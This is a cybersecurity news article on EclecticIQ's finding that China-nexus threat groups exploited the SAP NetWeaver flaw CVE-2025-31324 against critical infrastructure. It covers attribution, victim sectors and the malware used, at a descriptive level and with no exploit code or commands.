Researchers at EclecticIQ assess with high confidence that, in April 2025, China-nexus nation-state APTs (Advanced Persistent Threats) launched high-tempo exploitation campaigns targeting critical infrastructure networks. These operations focused on SAP NetWeaver Visual Composer, leveraging CVE-2025-31324, an unauthenticated file upload vulnerability that allows remote code execution (RCE). The assessment is supported by evidence from a publicly exposed directory (opendir) on attacker-controlled infrastructure, which contained detailed event logs documenting activity across multiple compromised systems.
The analysts link observed SAP NetWeaver intrusions to Chinese cyber-espionage units, including UNC5221, UNC5174, and CL-STA-0048, based on threat actor tradecraft patterns. EclecticIQ analysts assess with high confidence that a very likely China-nexus threat actor is conducting a widespread internet scanning and exploitation campaign against SAP NetWeaver systems. Threat actor–controlled server hosted at IP address 15.204.56[dot]106 exposed the scope of the SAP NetWeaver intrusions.
“Threat actor hosted an openly accessible directory (opendir) on their server, which contained two result files generated using Nuclei—a mass reconnaissance tool used to scan the internet for vulnerable SAP NetWeaver instances,” Arda Büyükkaya, EclecticIQ analyst, detailed in a media statement.
The files documented both the identification of exposed systems and successful exploitation attempts, offering insight into the attacker’s victimology.
EclecticIQ analysts assess with high confidence that the Chinese-language file names and attacker tradecraft across the compromised infrastructure reinforce attribution to a Chinese-speaking operator. The exposed open-dir infrastructure reveals confirmed breaches and highlights the group’s planned targets, offering clear insight into both past and future operations.
Büyükkaya also confirmed the presence of two Webshells, deployed after post-exploitation to maintain persistence and remote access into victim SAP systems.
Mandiant and Palo Alto researchers assess that these groups connect to China’s Ministry of State Security (MSS) or affiliated private entities. These actors operate strategically to compromise critical infrastructures, exfiltrate sensitive data, and maintain persistent access across high-value networks worldwide.
CL-STA-0048, a Chinese state-backed APT tracked by Unit 42, has a consistent track record of targeting strategic sectors across South Asia. EclecticIQ analysts assess with high confidence that this group is likely behind observed SAP NetWeaver intrusions. This assessment is based on overlaps in post-exploitation tactics, such as using the ping command for DNS beaconing and shared infrastructure.
EclecticIQ analysts assess with medium confidence that China-nexus group CL-STA-0048 is also likely linked to activities observed by Fortinet on October 11, 2024.
Analysis of the open-directory (open-dir) infrastructure reveals a targeted campaign against critical sectors across multiple countries. The threat actor’s victim selection reflects a strategic focus on essential services and government entities. In the U.K., targets included critical natural gas distribution networks and water and integrated waste management utilities. In the U.S., the focus was on advanced medical device manufacturing facilities and upstream oil and gas exploration and production companies. In Saudi Arabia, the campaign targeted government ministries responsible for investment strategy and financial regulation.
“Although many of the compromised entities operate within the private sector, their functions—such as delivering water to households, distributing energy, or producing advanced medical technologies—are vital to public welfare and national resilience,” Büyükkaya detailed. “The presence of persistent backdoor access to these systems provides China-aligned APTs with a foothold that may support the strategic objectives of the People’s Republic of China (PRC), including military, intelligence, and economic advantages.”
Additionally, the compromised SAP systems are deeply integrated with the internal networks of industrial control systems (ICS), which presents significant lateral movement risks. This connectivity raises the potential for short-term service disruptions and long-term espionage operations.
Following initial compromise via CVE-2025-31324, the Chinese-nexus threat actors conducted reconnaissance on infected SAP NetWeaver hosts by executing remote Linux commands using Webshells.
“Analysis of nearly 5,000 malicious commands executed across multiple victims clearly indicates that the threat actor performed network-level discovery and mapped SAP-specific applications,” Büyükkaya said. “The actor’s goal was to identify backup details and use these metadata for lateral movement. In most of the incidents, threat actors performed network discovery using commands. Their goal was to identify nearby systems that could serve as pivots for lateral movement, including targets within cloud-connected infrastructure like AWS workloads and Entra ID (formerly Azure AD) identities.”
EclecticIQ analysts assess with high confidence that the threat actor UNC5174 is very likely actively exploiting vulnerable SAP NetWeaver systems to deploy a multi-stage malware chain involving the SNOWLIGHT downloader, a GO-based Remote Access Trojan (RAT) malware called VShell, and GOREVERSE, a backdoor that operates over Secure Shell (SSH). Google threat researchers linked UNC5174 to the Chinese threat nexus, identifying it as an initial access broker and likely associated with the Ministry of State Security (MSS).
EclecticIQ’s assessment aligns with earlier findings from Google Mandiant and Sysdig, which have attributed similar TTPs to UNC5174. Mandiant previously linked UNC5174 to the exploitation of F5 BIG-IP (CVE-2023-46747) and ConnectWise ScreenConnect (CVE-2024-1709). Both of these vulnerabilities were used to deploy the SNOWLIGHT downloader.
These campaigns demonstrated UNC5174’s ability to leverage public vulnerabilities in their tradecraft and to maintain a modular infection chain catered around SNOWLIGHT downloader.
Büyükkaya identified that Sysdig’s research further confirmed the use of VShell by UNC5174 in cloud-native and containerized environments, where the group used in-memory implants and runtime evasion tactics. “The reuse of SNOWLIGHT and VShell in the SAP NetWeaver intrusions observed by EclecticIQ analysts provides strong supporting evidence of actor continuity and their target scope toward enterprise infrastructure.”
Given the consistent infrastructure, malware reuse, and tactical overlap, EclecticIQ assesses with high confidence that this activity is very likely attributable to UNC5174 and represents an ongoing campaign to exploit high-value enterprise systems.
EclecticIQ analysts assess with high confidence that China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic and ‘persistence access’ to critical infrastructure networks globally. Their focus on widely used platforms like SAP NetWeaver is a strategic move, as these systems are deeply integrated into enterprise environments and often host unpatched vulnerabilities.
“Compromising such applications, China-nexus APTs can gain high-privilege access to internal networks, including cloud services, VMware ESXi virtual machines, and operationally critical IoT/OT devices,” Büyükkaya noted. “This enables cyber espionage, sustained surveillance, and potential disruption during geopolitical crises involving China. The exposure of these essential systems transforms technical vulnerabilities into serious national and economic security threats, given their foundational role in government and business operations.”
